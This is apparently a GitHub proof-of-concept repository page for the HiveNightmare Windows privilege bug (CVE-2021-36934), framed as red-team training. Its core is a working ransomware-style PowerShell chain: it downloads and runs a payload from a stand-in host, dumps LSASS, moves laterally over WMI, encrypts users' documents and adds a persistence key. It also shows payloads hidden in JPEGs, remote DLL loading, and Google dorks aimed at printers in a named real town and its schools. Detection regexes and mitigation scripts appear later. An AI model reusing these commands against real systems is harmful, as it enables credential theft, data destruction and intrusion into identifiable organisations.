CVE-2021-36934 PoC — Windows Elevation of Privilege Vulnerability

Associated Vulnerability

Title: Windows Elevation of Privilege Vulnerability (CVE-2021-36934)

Description: An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have the ability to execute code on a victim system to exploit this vulnerability. After installing this security update, you *must* manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerability. **Simply installing this security update will not fully mitigate this vulnerability.** See [KB5005357 - Delete Volume Shadow Copies](https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7).

Repository description: PoC malware that exploits CVE-2021-36934 (overly permissive ACLs on the registry hive files, which any local user can read through Volume Shadow Copies) using a fileless red-team method on Windows 10/11 with LOLBins, extracting the SYSTEM and SAM hives to recover local NTLM hashes.

Readme


# HiveNightmare 'Fileless' Exploit PoC:

![Screenshot 2025-05-21 001453](https://github.com/user-attachments/assets/15ccb34b-483d-497a-8fa9-70f0f61232d6)

---

## Table of Contents

- [Overview](#overview)
- [Features](#features)
- [Lab Simulation Example](#lab-simulation-example)
- [Reconnaissance with Google Dorks](#reconnaissance-with-google-dorks)
- [LOLBins Overview](#lolbins-overview)
- [Fileless Dropper Embedding](#fileless-dropper-embedding)
- [Exploiting Print Spooler & HiveNightmare](#exploiting-print-spooler--hivenightmare)
- [Reflective DLL Injection](#reflective-dll-injection)
- [MITRE ATT&CK Mapping](#mitre-attck-mapping)
- [Detection & Mitigation](#detection--mitigation)
- [Legal Disclaimer](#legal-disclaimer)
- [References & Further Reading](#references--further-reading)

---

## Overview

**CVE-2021-36934/HiveNightmare** is an educational red/purple team research project that simulates a **fileless malware** attack framework on **Windows 11**. It enables the emulation of real-world adversary kill chains using [MITRE ATT&CK](https://attack.mitre.org/) techniques, with a focus on stealthy, fileless operations.

> **Warning:** For research and training in isolated labs only. **Do not use on production or unauthorized systems.**

---

## Features

- Simulates end-to-end fileless ransomware/wiperware attacks
- Demonstrates use of Living Off the Land Binaries (LOLBins)
- Showcases credential access, privilege escalation, lateral movement, and persistence
- Contains practical lab and reconnaissance examples
- Maps to MITRE ATT&CK for blue team detection exercises

---

## Lab Simulation Example

The following PowerShell simulation walks a typical ransomware attack chain using built-in Windows tools (LOLBins). Only the dropper and payload-loading steps are truly fileless: the elevation script, the LSASS dump and the persistence script all touch `C:\Temp`, which is exactly the kind of artifact the detection section keys on.

```powershell
# Initial Access: fetch the dropper and run it in memory (placeholder URL)
IEX (New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: decode and load an in-memory .NET payload ([Base64Payload] is a placeholder)
$bytes = [System.Convert]::FromBase64String("[Base64Payload]")
[System.Reflection.Assembly]::Load($bytes)

# Privilege Escalation: -Verb RunAs goes through UAC, so this is a consent prompt,
# not a silent escalation; the SYSTEM step proper is the HiveNightmare/spooler chain
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access: comsvcs.dll MiniDump needs SeDebugPrivilege (elevated context)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement: remote process creation over WMI
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example: the fixed key and all-zero IV are lab shortcuts, not a real scheme.
# Files are read as raw bytes: reading .docx/.pdf as text would corrupt them, and the
# character count would not match the byte count passed to TransformFinalBlock.
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = [System.IO.File]::ReadAllBytes($file.FullName)
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")  # 32 bytes = AES-256
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock($data, 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence: per-user Run key
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"
```

---

## Reconnaissance with Google Dorks

**Example Objective:** Identify publicly exposed printer services in Moberly, Missouri, potentially vulnerable to exploits like PrintNightmare.

**Sample Google Dork Queries:**

```
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"
```

---

## LOLBins Overview

**Living Off the Land Binaries (LOLBins)** are legitimate, trusted Windows binaries commonly abused by adversaries to bypass security controls and run malicious code filelessly.

**Example Use (Print Service Attack):**

```cmd
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry
```

> Attackers use LOLBins like `rundll32.exe`, `regsvr32.exe`, and `powershell.exe` to execute payloads straight from network shares, often after identifying exposed printers or servers during reconnaissance. The payload never touches the local disk, but `rundll32.exe` still maps it through the normal Windows loader, so the load is visible to image-load telemetry and to the SMB server's logs.

---

## Fileless Dropper Embedding

**Goal:** Deliver payloads covertly by appending an encoded archive to an image and extracting it with built-in tools.

**Steps:**

1. **Embed Payload:** `certutil -encode` turns the archive into a base64 block wrapped in `-----BEGIN CERTIFICATE-----` / `-----END CERTIFICATE-----` markers; `copy /b` appends it after the JPEG's end-of-image marker, so the file still opens as a picture:
   ```cmd
   certutil -encode payload.7z payload.b64
   copy /b nsfw.jpg + payload.b64 nsfw.jpg
   ```

2. **Extract & Decode:** `certutil -decode` looks for the BEGIN/END markers and ignores the image bytes in front of them, which is why the archive has to be base64-encoded in step 1 rather than appended raw. Note that `7z` is not a built-in tool; the `tar.exe` that ships with Windows 10 1803 and later would keep the chain native for a .zip or .tar payload:
   ```cmd
   certutil -decode nsfw.jpg dropper.7z
   7z x dropper.7z -oC:\Users\Public\
   ```

> This method bypasses simple file-extension filtering and relies on a signed system binary for the decode step, but `certutil -decode` on a non-certificate file is itself a well-known detection trigger (see the detection rules shipped in `lab/lolbins`).
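As an added example (not code from the PoC repository), here is the defensive counterpart of the trick above: a PowerShell check that walks a JPEG's marker structure to find the real end-of-image offset and reports whether anything is appended after it, flagging a certutil-style `-----BEGIN CERTIFICATE-----` block or a raw 7z header. Walking the segments instead of searching for the last `FF D9` matters, because appended binary data can contain that byte pair by chance. The sample polyglot is constructed in memory, and the function names are this example's own.

```powershell
# Added example, not part of the PoC: detect data appended after a JPEG's end-of-image.

function Find-JpegEnd {
    # Returns the offset just past the EOI marker, or -1 if the stream is malformed.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $n = $Bytes.Length
    if ($n -lt 4 -or $Bytes[0] -ne 0xFF -or $Bytes[1] -ne 0xD8) { return -1 }   # must start with SOI
    $p = 2
    while ($p + 1 -lt $n) {
        if ($Bytes[$p] -ne 0xFF) { return -1 }
        $m = $Bytes[$p + 1]
        if ($m -eq 0xD9) { return $p + 2 }                                        # EOI
        if ($m -eq 0xFF) { $p++; continue }                                       # fill byte
        if ($m -eq 0x01 -or ($m -ge 0xD0 -and $m -le 0xD8)) { $p += 2; continue } # standalone markers
        if ($p + 3 -ge $n) { return -1 }
        $len = ($Bytes[$p + 2] -shl 8) -bor $Bytes[$p + 3]                        # length includes itself
        $p += 2 + $len
        if ($m -eq 0xDA) {
            # Start Of Scan: skip entropy-coded data until a marker that is neither
            # byte stuffing (FF 00) nor a restart marker (FF D0..D7).
            while ($p + 1 -lt $n) {
                if ($Bytes[$p] -eq 0xFF -and $Bytes[$p + 1] -ne 0x00 -and
                    -not ($Bytes[$p + 1] -ge 0xD0 -and $Bytes[$p + 1] -le 0xD7)) { break }
                $p++
            }
        }
    }
    return -1
}

function Test-JpegTrailer {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $end = Find-JpegEnd -Bytes $Bytes
    if ($end -lt 0) { throw 'Not a well-formed JPEG' }
    $trailer = if ($end -lt $Bytes.Length) { [byte[]]$Bytes[$end..($Bytes.Length - 1)] } else { [byte[]]@() }
    $text = [System.Text.Encoding]::ASCII.GetString($trailer)
    # 7z signature: 37 7A BC AF 27 1C
    $magic = if ($trailer.Length -ge 6) { ($trailer[0..5] | ForEach-Object { '{0:X2}' -f $_ }) -join '' } else { '' }
    [pscustomobject]@{
        ImageBytes    = $end
        TrailerBytes  = $trailer.Length
        CertutilBlock = [bool]($text -match '-----BEGIN CERTIFICATE-----')
        Raw7zArchive  = ($magic -eq '377ABCAF271C')
    }
}

function New-SampleJpegPolyglot {
    # Constructed sample: a minimal JPEG (SOI, APP0, SOS with a stuffed FF 00 and an RST0
    # marker inside the scan, EOI) followed by a certutil-style block, as copy /b would produce.
    $jpeg = [byte[]](
        0xFF,0xD8,                              # SOI
        0xFF,0xE0,0x00,0x04,0x4A,0x46,          # APP0, length 4
        0xFF,0xDA,0x00,0x04,0x01,0x00,          # SOS, length 4
        0x12,0xFF,0x00,0x34,0xFF,0xD0,0x56,     # entropy data: stuffed FF, RST0
        0xFF,0xD9)                              # EOI
    $b64 = [System.Text.Encoding]::ASCII.GetBytes(
        "-----BEGIN CERTIFICATE-----`r`nN3q8ryccAAQ=`r`n-----END CERTIFICATE-----`r`n")
    return [byte[]]($jpeg + $b64)
}

Test-JpegTrailer -Bytes (New-SampleJpegPolyglot)
# Real file: Test-JpegTrailer -Bytes ([System.IO.File]::ReadAllBytes('C:\path\nsfw.jpg'))
```

A non-zero `TrailerBytes` is not proof of malice on its own (some cameras and editors append metadata after EOI), so the certificate-block and archive-signature checks are what should drive an alert.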

---

## Reflective DLL Injection

**Technique:** Load a DLL whose exported entry point maps and executes the real payload in memory (reflective loading), so the payload itself is never written to the local disk.

**Example:**
```cmd
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry
```

> `rundll32.exe` itself performs an ordinary `LoadLibrary` of `nsfw.dll` from the share and then calls the export; the reflective part is done by the code behind `ReflectEntry`, not by rundll32. This keeps the payload off the local disk, but the DLL load from a UNC path is still recorded by image-load telemetry (Sysmon Event ID 7) and the SMB read is visible on the network.

---

## MITRE ATT&CK Mapping

| Phase                | Technique                                                                 | ID                              | Description                                                        |
|----------------------|---------------------------------------------------------------------------|---------------------------------|--------------------------------------------------------------------|
| Initial Access       | Exploit Public-Facing Application / Valid Accounts                        | T1190, T1078                    | Compromising exposed print interfaces found during reconnaissance  |
| Execution            | System Binary Proxy Execution: Rundll32 (LOLBins)                         | T1218.011                       | Running payload DLLs through trusted, signed binaries              |
| Privilege Escalation | Exploitation for Privilege Escalation (Print Spooler, hive ACLs)          | T1068                           | SYSTEM-level access                                                |
| Defense Evasion      | Obfuscated Files / Deobfuscate-Decode Files / Reflective Code Loading     | T1027, T1140, T1620, T1055.001  | Encoded payloads decoded with certutil; DLLs loaded in memory      |
| Credential Access    | OS Credential Dumping: LSASS Memory / SAM                                 | T1003.001, T1003.002            | LSASS dump and SAM/SYSTEM hive extraction after HiveNightmare      |
| Lateral Movement     | Remote Services: SMB/Windows Admin Shares / WMI                           | T1021.002, T1047                | Spread via shares and remote process creation                      |
| Impact               | Data Destruction / Data Encrypted for Impact                              | T1485, T1486                    | Fileless wiperware triggered via DLL payloads                      |

---

## Detection & Mitigation

### Detection

- **Sysmon + Sigma Rules:**
  - Process creation (Event ID 1): `rundll32.exe` or `regsvr32.exe` given a UNC path (`\\host\share\...`) or a user-writable path, and `rundll32.exe` invoking `comsvcs.dll, MiniDump`
  - Image load (Event ID 7): DLLs loaded from network shares or from outside `C:\Windows` and `C:\Program Files`
  - `certutil.exe` with `-decode`, `-encode` or `-urlcache`, and `mshta.exe` / `regsvr32.exe` fetching remote content
  - Command lines or file opens referencing `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...\config\SAM`, and `vssadmin list shadows` run by a standard user (the `lab/lolbins` folder of this repository ships Sigma and Elastic rules for several of these)

- **SIEM Examples (ELK/Splunk):**
  - Execution from public or network shares
  - Parent/child process anomalies (e.g., `explorer.exe` or an Office process spawning `rundll32.exe` with a non-system DLL argument)
  - Base64 `-EncodedCommand` PowerShell and other encoded command lines
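The repository's `lab/lolbins` folder ships Sigma and Elastic rules for several of these behaviours. As a lighter, stand-alone illustration of the same logic, added here and not the project's code, the following PowerShell matches the command-line patterns listed above against a handful of constructed Sysmon-style command lines. The indicator names, regular expressions and sample lines are this example's own; the commented `Get-WinEvent` pipeline at the end shows how to feed it real Sysmon Event ID 1 data.

```powershell
# Added example, not part of the PoC: regex triage of process command lines
# (e.g. the CommandLine field of Sysmon Event ID 1) for the LOLBin patterns above.
$Indicators = @(
    @{ Name = 'rundll32 loading DLL from UNC path';     Pattern = '(?i)rundll32(\.exe)?\s+\\\\[^\s,]+' }
    @{ Name = 'comsvcs MiniDump (LSASS dump)';           Pattern = '(?i)comsvcs\.dll\s*,?\s*MiniDump' }
    @{ Name = 'certutil decode/encode/urlcache';         Pattern = '(?i)certutil(\.exe)?\s+.*-(decode|urlcache|encode)\b' }
    @{ Name = 'shadow copy path access (HiveNightmare)'; Pattern = '(?i)HarddiskVolumeShadowCopy\d+' }
    @{ Name = 'vssadmin list/delete shadows';            Pattern = '(?i)vssadmin(\.exe)?\s+(list|delete)\s+shadows' }
    @{ Name = 'reg.exe save of SAM/SYSTEM/SECURITY';     Pattern = '(?i)reg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b' }
    @{ Name = 'PowerShell encoded command';              Pattern = '(?i)powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}' }
)

function Find-LolbinIndicators {
    # Emits one record per (indicator, command line) hit; lines with no hit produce nothing.
    param([Parameter(Mandatory)][string[]]$CommandLine)
    foreach ($cl in $CommandLine) {
        foreach ($ind in $Indicators) {
            if ($cl -match $ind.Pattern) {
                [pscustomobject]@{ Indicator = $ind.Name; CommandLine = $cl }
            }
        }
    }
}

# Constructed sample command lines (not real telemetry); the last one is benign.
$samples = @(
    'rundll32.exe \\10.10.5.7\share\nsfw.dll,ReflectEntry',
    'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Temp\lsass.dmp full',
    'certutil -decode nsfw.jpg dropper.7z',
    'cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM',
    'vssadmin list shadows',
    'reg.exe save hklm\sam C:\Temp\sam.hiv',
    'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    'rundll32.exe shell32.dll,Control_RunDLL desk.cpl'
)
Find-LolbinIndicators -CommandLine $samples | Format-Table -AutoSize

# Live data: pull CommandLine from Sysmon Event ID 1 and pipe it in.
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ForEach-Object { ([xml]$_.ToXml()).Event.EventData.Data |
#       Where-Object Name -eq 'CommandLine' | Select-Object -ExpandProperty '#text' } |
#     ForEach-Object { Find-LolbinIndicators -CommandLine $_ }
```

The patterns are deliberately broad (any `rundll32` with a UNC argument, any `certutil -decode`), which is the right trade-off for a hunting query; for an alerting rule, add the parent process and user context from the same event before promoting a hit.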

### Mitigation

- Disable Print Spooler where it is not needed (PowerShell, elevated):
  ```powershell
  Stop-Service -Name Spooler -Force
  Set-Service -Name Spooler -StartupType Disabled
  ```
- Install the security update for CVE-2021-36934, then follow KB5005357: restore ACL inheritance on the hive files under `%windir%\System32\config` and delete existing shadow copies, since copies taken before the fix still carry the permissive ACL
- Block or restrict LOLBins (`rundll32.exe`, `regsvr32.exe`, `certutil.exe`, `mshta.exe`) with AppLocker or WDAC, at least for standard users and for arguments pointing at UNC or user-writable paths
- Use EDR solutions that detect reflective DLL loading and in-memory attacks
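Because the advisory says that patching alone does not fully close CVE-2021-36934, the check a practitioner wants is twofold: is `BUILTIN\Users` still granted access on the hive files, and do shadow copies taken under the old ACL still exist? The following PowerShell, added here as an example and not part of the PoC (the function names are this example's own), audits both and wraps the two remediation commands Microsoft documents for this issue: re-enabling ACL inheritance on `%windir%\System32\config\*.*` and deleting the volume's shadow copies. Run it from an elevated prompt.

```powershell
# Added example, not part of the PoC: audit and remediate the CVE-2021-36934 conditions.
# Requires an elevated PowerShell session.

function Test-HiveNightmareExposure {
    $hives = 'SAM', 'SYSTEM', 'SECURITY' | ForEach-Object { Join-Path $env:windir "System32\config\$_" }
    $results = foreach ($hive in $hives) {
        # Reading the ACL only needs READ_CONTROL, so this works even though the hive is locked.
        $acl = Get-Acl -LiteralPath $hive
        # BUILTIN\Users is S-1-5-32-545; compare by SID so the check is locale-independent.
        $usersAllowed = $acl.Access | Where-Object {
            $sid = try { $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null }
            $_.AccessControlType -eq 'Allow' -and $sid -eq 'S-1-5-32-545'
        }
        [pscustomobject]@{ Hive = $hive; UsersCanRead = [bool]$usersAllowed }
    }
    # A shadow copy snapshots the file ACLs as they were at creation time, so copies taken
    # while the ACL was permissive stay readable even after the live ACL is corrected.
    $shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)
    [pscustomobject]@{
        Hives            = $results
        ShadowCopies     = $shadows | Select-Object ID, DeviceObject, InstallDate
        Vulnerable       = [bool]($results.UsersCanRead -contains $true)
        ResidualExposure = ($shadows.Count -gt 0)
    }
}

function Invoke-HiveNightmareMitigation {
    [CmdletBinding(SupportsShouldProcess)]
    param([string]$Volume = 'C:')
    $config = Join-Path $env:windir 'System32\config\*.*'
    if ($PSCmdlet.ShouldProcess($config, 'icacls /inheritance:e')) {
        # Microsoft's workaround: re-enable inheritance so the hives pick up the
        # restrictive ACL of the config folder.
        icacls $config /inheritance:e | Out-Null
    }
    if ($PSCmdlet.ShouldProcess("$Volume shadow copies", 'vssadmin delete shadows')) {
        # KB5005357: delete every existing shadow copy of the volume.
        vssadmin delete shadows /for=$Volume /Quiet | Out-Null
    }
}

$state = Test-HiveNightmareExposure
$state.Hives | Format-Table -AutoSize
$state.ShadowCopies | Format-Table -AutoSize
if ($state.Vulnerable -or $state.ResidualExposure) {
    Invoke-HiveNightmareMitigation -Volume 'C:' -WhatIf   # drop -WhatIf to apply
}
```

Deleting shadow copies also removes System Restore points and "previous versions" of files on that volume, so schedule it accordingly on servers; `-WhatIf` previews both commands without running them. Re-run `Test-HiveNightmareExposure` afterwards and expect `UsersCanRead` to be `False` for all three hives and an empty shadow copy list.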

---

## Legal Disclaimer

> **All content, code, and techniques in this repository are for educational and authorized penetration testing only. Do not use any part of this project outside of controlled, isolated environments and without explicit permission. The authors assume no liability for misuse.**

---

## References & Further Reading

- [LOLOL Farm – LOLBin Playground](https://lolol.farm/)
- [LOLGEN – Generate LOLBin Chains](https://lolgen.hdks.org/)
- [Detecting SeriousSam (CVE-2021-36934) with Splunk](https://medium.com/@mvelazco/detecting-serioussam-cve-2021-36934-with-splunk-855dcbb10076)
- [DLL Injection Primer](https://www.crow.rip/crows-nest/mal/dev/inject/dll-injection)
- [PrintNightmare is not over – Print Spooler exploit chain](https://itm4n.github.io/printnightmare-not-over/)
- [Fileless Malware – Wikipedia](https://en.wikipedia.org/wiki/Fileless_malware)
- [PrintSpoofer (original)](https://github.com/itm4n/PrintSpoofer/tree/master)
- [HiveNightmare (GossiTheDog)](https://github.com/GossiTheDog/HiveNightmare)
- [MITRE ATT&CK T1055.001 – Process Injection: Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001/)
- [HiveNightmare aka SeriousSam: anybody can read the registry in Windows 10 (DoublePulsar)](https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5)

---

**Stay safe, research responsibly, and always use in a legal and ethical manner.**
File Snapshot

```
[4.0K] /data/pocs/34f213a244a2b70b450ce8e6df554865b22fda04
├── [4.0K] core
│   ├── [ 219] build_sfx.ps1
│   ├── [ 787] build_windows.bat
│   ├── [  59] config.txt
│   ├── [4.0K] nightmare
│   │   ├── [6.1K] dll_inject.cpp
│   │   ├── [ 925] dllmain.cpp
│   │   ├── [ 154] framework.h
│   │   ├── [6.0K] hive_nightmare.cpp
│   │   ├── [4.0K] include
│   │   │   ├── [ 659] data_wipe.h
│   │   │   ├── [3.1K] defines.h
│   │   │   ├── [2.9K] devhook.h
│   │   │   ├── [ 983] device_io.h
│   │   │   ├── [ 794] fast_crypt.h
│   │   │   ├── [ 501] misc.h
│   │   │   ├── [ 771] misc_mem.h
│   │   │   ├── [505K] ntifs.h
│   │   │   └── [ 219] prng.h
│   │   ├── [8.4K] nightmare.vcxproj
│   │   ├── [1.3K] nightmare.vcxproj.filters
│   │   ├── [ 168] nightmare.vcxproj.user
│   │   ├── [4.3K] nsfw.cpp
│   │   ├── [ 694] nsfw.h
│   │   ├── [ 191] pch.cpp
│   │   ├── [ 576] pch.h
│   │   └── [4.0K] x64
│   │       ├── [4.0K] Debug
│   │       │   ├── [ 62K] nightmare.dll
│   │       │   └── [1.6M] nightmare.pdb
│   │       └── [4.0K] Release
│   │           ├── [102K] nightmare.dll
│   │           └── [4.1M] nightmare.pdb
│   └── [1.4K] nightmare.sln
├── [177K] dropper.pdf
├── [4.0K] lab
│   ├── [4.0K] atomic red
│   │   ├── [1.3K] run_tests.py
│   │   └── [4.0K] tests
│   │       └── [1.7K] hive_nightmare.yml
│   ├── [4.0K] caldera
│   │   ├── [ 799] deploy_caldera.sh
│   │   └── [4.0K] plugin
│   │       └── [ 320] songbird.yaml
│   ├── [4.0K] docs
│   │   ├── [162K] 13007-reflective-dll-injection.pdf
│   │   ├── [ 72K] Fileless-malware-Matko-Antun-Bekavac.pdf
│   │   └── [1.5M] hivenightmare-aka-serious-sam-cve-2021-36934.pdf
│   ├── [4.0K] logs
│   │   └── [1.0K] export_logs.ps1
│   ├── [4.0K] lolbins
│   │   ├── [3.1K] attempted_credential_dump_from_registry_via_reg_exe.yml
│   │   ├── [3.3K] certutil_download_with_urlcache_and_split_arguments.yml
│   │   ├── [3.5K] certutil_with_decode_argument.yml
│   │   ├── [1.8K] command_and_control_certutil_network_connection.toml
│   │   ├── [1.5K] credential_access_dump_registry_hives.toml
│   │   ├── [1.6K] defense_evasion_suspicious_certutil_commands.toml
│   │   ├── [1.9K] defense_evasion_unusual_network_connection_via_rundll32.toml
│   │   ├── [1.6K] Netsh.yml
│   │   ├── [1.8K] powershell.yml
│   │   ├── [1.3K] proc_creation_win_certutil_download.yml
│   │   ├── [1.2K] proc_creation_win_certutil_encode.yml
│   │   ├── [ 610] proc_creation_win_lolbin_pktmon.yml
│   │   ├── [1.0K] proc_creation_win_netsh_helper_dll_persistence.yml
│   │   ├── [2.1K] proc_creation_win_reg_dumping_sensitive_hives.yml
│   │   ├── [1.1K] proc_creation_win_regedit_import_keys_ads.yml
│   │   ├── [1.2K] proc_creation_win_regedit_import_keys.yml
│   │   ├── [3.9K] proc_creation_win_rundll32_susp_activity.yml
│   │   ├── [2.1K] processes_created_by_netsh.yml
│   │   ├── [2.7K] processes_launching_netsh.yml
│   │   ├── [3.9K] Rundll32.yml
│   │   ├── [1.7K] Schtasks.yml
│   │   ├── [2.3K] Sc.yml
│   │   ├── [ 14K] the_lolbas_project.json
│   │   └── [117K] The_LOLBAS_Project.svg
│   ├── [4.0K] loldrivers
│   │   ├── [611K] 275c80c5-a67c-4536-b29e-4e481242cb01.md
│   │   └── [283K] 275c80c5-a67c-4536-b29e-4e481242cb01.yaml
│   ├── [1.9K] mitigation.ps1
│   └── [2.3K] rundll32_dump.txt
├── [1.1K] LICENSE
└── [8.3K] README.md

15 directories, 67 files
```